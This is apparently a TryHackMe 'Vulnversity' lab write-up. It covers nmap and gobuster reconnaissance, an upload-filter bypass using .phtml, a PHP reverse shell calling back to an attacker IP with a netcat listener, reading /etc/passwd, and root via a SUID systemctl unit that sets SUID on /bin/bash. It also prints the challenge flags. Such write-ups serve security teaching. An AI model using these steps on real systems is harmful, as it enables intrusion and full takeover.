TryHackMe: Vulnversity Write ups By Md Mirajul Haque Miraj || MirajulHaque || Security?Path

Note: The write-ups written only for Educational Purposes. All the credits go to TryHackMe for making this room. Please try and try yourself before reading this write-up. Thanks. Let’s get STARTED…

Task 1: Deploy the?machine

? No answer needed

Task 2: Reconnaissance

Let’s gather information about the target following the instruction, using nmap…

nmap -sV 10.10.194.205

? we found 6 open ports including SSH. Let’s jump on questions…

?? Scan the box; how many ports are open?

?? 6

?? What version of the squid proxy is running on the machine?

?? 3.5.12

?? How many ports will Nmap scan if the flag -p-400 was used?

? if we use -p-400 like below

nmap -sV -p-400 10.10.194.205

? Then nmap will scan only the first 400 ports, here is the result for using this command

?? 400

?? What is the most likely operating system this machine is running?

?? Ubuntu

?? What port is the web server running on?

? Apache is the server and open service is http.

?? 3333

?? What is the flag for enabling verbose mode using Nmap?

?? -v

Task 3: Locating Directories using?Gobuster

To find the directory use the command below, we found HTTP on port 3333…

gobuster dir -u <https://10.10.194.205:3333> -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

? Yeah we got something, let’s jump on the question…

?? What is the directory that has an upload form page?

? We need to visit every directory, to identify the upload form page, let’s do it one by one…

? Here we go, found this one.

?? /internal/

Task 4: Compromise the Webserver

? We usually upload?.php files to exploit, right?

?? What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

???.php

? But after trying we found this is not allowed here, let’s check for more using the tool name BurpSuite.

? Before intercepting I am going to make a wordlist following the instructions using a tool named vim…

~$ vi phpextenstions.txt

? A new window should open, then press on the ‘Insert’ button and start typing the extensions mentioned on the task content, like below…

? Then press on the ‘Esc’ button, then type colon (:) and wq (w for write and q for quit)

? Now open burpsuite and intercept the upload request,

? Send it to Intruder and set the attack type to sniper, then add a target point to extension for our purpose it is ‘.jpg’ ↓↓

? Select the ‘Payloads’ option and load the file we created named phpextensions.txt then click on ‘Start Attack button’

Note: Don’t forget to uncheck the ‘URL-encode these characters’ option before starting the attack.

? Result ↓↓

? We found?.phtml with different lengths, that should work or this extension is allowed…

?? Run this attack, what extension is allowed?

???.phtml

? It’s time to download the reverse shell following the link given on the task content. and change the extension?.php to?.phtml. (Because only?.phtml extension is allowed)

? Another tab on the terminal and type ifconfig and hit enter

? open it with any word-processing or editing tool, like vim and edit the ip ‘127.0.0.1’ to ‘10.4.42.77’

? Upload it

? Successfully uploaded

? Now open netcat listener with command below

~$ nc -lvnp 1234

? visit the link ↓↓

https://10.10.194.205:3333/internal/uploads/php-reverse-shell.phtml

? now check the terminal where you ran nc -lvnp 1234 command

?? What is the name of the user who manages the webserver?

? We got a terminal, let’s find out the user

? Hit this command below to read the users list

~$ cat /etc/passwd

Note: You may check also the home directory before reading /etc/passwd

?? bill

?? What is the user flag?

? see the hints

? Let’s go and check the /home/bill directory

?? 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: Privilege Escalation

?? On the system, search for all SUID files. Which file stands out?

? See the hint ? Run the command ↓↓

~$ find / -user root -perm -4000 -exec ls -ldb {} \\;

? Explanation

• find → Command for searching something
• / → Specifying from where one should start. only / means from home or root. if say /home/miraj/ then it will show the result from the /home/miraj/ directory
• -user root → Indicates that the search should be limited to files owned by the user 'root'.
• -perm -4000 → Specifies the search condition based on file permissions. Here, it looks for files with the SUID bit set (permission mode 4000).
• -exec ls -ldb { } \\; → Executes the ls -ldb command on each file found by the find command. ls -ldb lists files in a long format and escapes special characters for better visibility. The {} represents each found file, and \\; marks the end of the -exec command.

? We found

? Now go to: https://gtfobins.github.io/# and check each to find out which file has the SUID functionality.

→ su = sudo → mount = sudo → systemctl = SUID

? So the answer should be

?? /bin/systemctl

? Now important part is what is SUID and why it is useful to access upper-privileged files?

== SUID means Set User ID. When a file gain the SUID permission, it allows any user to execute the file with the permissions of the file owner. For example, if a file owned by the root user has the SUID bit set, any user executing that file will temporarily gain the root user’s permissions.

?? Become root and get the last flag (/root/root.txt)

? Visit the systemctl file we found on gtfobins website

? See the marked code carefully

? Now, need to change a bit following our question, and after changing the code should be like below ↓↓

TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p        

? Then go to /bin/ directory and paste the above code

~$ cd /bin/

? Then use these commands one by one

~$ cd /root/

~$ls

~$ cat root.txt

?? a58ff8579f0a9270368d33a9966c7fd5

~Thanks For Reading~

~Have a GooD?DaY~